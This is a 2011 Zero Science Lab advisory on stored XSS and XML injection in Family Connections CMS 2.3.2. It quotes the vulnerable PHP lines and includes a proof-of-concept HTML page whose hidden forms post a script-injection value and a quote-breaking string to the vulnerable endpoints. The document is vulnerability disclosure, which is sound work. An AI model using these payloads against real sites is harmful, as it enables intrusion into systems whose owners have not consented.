Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection

2011-03-25T00:00:00
ID ZSL-2011-5004
Type zeroscience
Reporter Gjoko Krstic
Modified 2011-03-25T00:00:00

Description

Title: Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection
Advisory ID: ZSL-2011-5004
Type: Remote
Impact: Cross-Site Scripting, System Access, Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data
Risk: (3/5)
Release Date: 25.03.2011

Summary

Family Connections is an open source content management system. It makes creating a private, family website easy and fun.

Description

FCMS suffers from a stored XSS vulnerability (post-auth) in messageboard.php script thru the 'subject' post parameter. XML Inj. lies in the /inc/getChat.php script with 'users' get parameter with no args, and post parameter 'message'.

--------------------------------------------------------------------------------

` /inc/getChat.php

30: // New Chat text
31: if (isset($_POST['message']) && $_POST['message'] != '') {
32: $sql = "INSERT INTO fcms_chat_messages(chat_id, user_id, user_name, message, post_time)
33: VALUES (1, " . cleanInput($_POST['user_id']) . ", '" . cleanInput($_POST['name']) . "', '" . cleanInput($_POST['message']) . "', NOW())";
...
46: //Create the XML response.
47: $xml = '<?xml version="1.0" ?><root>';
48: // Get Users Online
49: if (isset($_GET['users']))
50: // Timezone stuff
51: $sql = "SELECT timezone FROM fcms_user_settings WHERE user = ".cleanInput($_GET['user_id']);
...
107: $xml .= '<text>' . htmlspecialchars($message_array['message']) . '</text>';
`
--------------------------------------------------------------------------------

Vendor

Ryan Haudenschilt - <http://www.familycms.com>

Affected Version

2.3.2

Tested On

Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41

Vendor Status

N/A

PoC

fccms_xml.html

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
High five to Michael Brooks

References

[1] <http://packetstormsecurity.org/files/99734>
[2] <http://www.securityfocus.com/bid/47037>
[3] <http://www.securityfocus.com/bid/47038>
[4] <http://www.exploit-db.com/exploits/17050/>
[5] <http://securityreason.com/wlb_show/WLB-2011030110>
[6] <http://securityreason.com/exploitalert/10206>
[7] <http://secunia.com/advisories/39760/>

Changelog

[25.03.2011] - Initial release
[26.03.2011] - Added reference [2], [3] and [4]
[28.03.2011] - Added reference [5] and [6]
[30.03.2011] - Changed title, PoC file and Credits
[02.04.2011] - Added reference [7]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            &lt;!--


Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection


Vendor: Ryan Haudenschilt
Product web page: http://www.familycms.com
Affected version: 2.3.2

Summary: Family Connections is an open source
content management system. It makes creating a
private, family website easy and fun.

Desc: FCMS suffers from a stored XSS vulnerability
(post-auth) in messageboard.php script thru the
'subject' post parameter. XML Inj. lies in the
/inc/getChat.php script with 'users' get parameter with
no args, and post parameter 'message'.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab - http://www.zeroscience.mk


Advisory ID: ZSL-2011-5004
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php


22.03.2011


--&gt;



&lt;html&gt;
&lt;title&gt;Family Connections CMS 2.3.2 Stored XSS And XML Injection&lt;/title&gt;
&lt;body bgcolor="#1C1C1C"&gt;
&lt;script type="text/javascript"&gt;
function xml(){document.forms["xml"].submit();}
function xss(){document.forms["xss"].submit();}
&lt;/script&gt;
&lt;form action="http://FCMS/inc/getChat.php" enctype="application/x-www-form-urlencoded" method="POST" id="xml"&gt;
&lt;input type="hidden" name="message" value="\\';--\\&#34;;--" /&gt;&lt;/form&gt;
&lt;a href="javascript: xml();" style="text-decoration:none"&gt;
&lt;b&gt;&lt;font color="red"&gt;&lt;center&gt;&lt;h3&gt;&lt;br /&gt;&lt;br /&gt;Exploit XML Injection!&lt;h3&gt;&lt;/center&gt;&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;
&lt;form action="http://FCMS/messageboard.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss"&gt;
&lt;input type="hidden" name="subject" value='"&gt;&lt;script&gt;alert(1)&lt;/script&gt;' /&gt;
&lt;input type="hidden" name="post" value="waddup" /&gt;
&lt;input type="hidden" name="name" value="1" /&gt;
&lt;input type="hidden" name="post_submit" value="Submit" /&gt;&lt;/form&gt;
&lt;a href="javascript: xss();" style="text-decoration:none"&gt;
&lt;b&gt;&lt;font color="red"&gt;&lt;center&gt;&lt;h3&gt;&lt;br /&gt;&lt;br /&gt;Exploit XSS!&lt;h3&gt;&lt;/center&gt;&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;
&lt;/body&gt;&lt;/html&gt;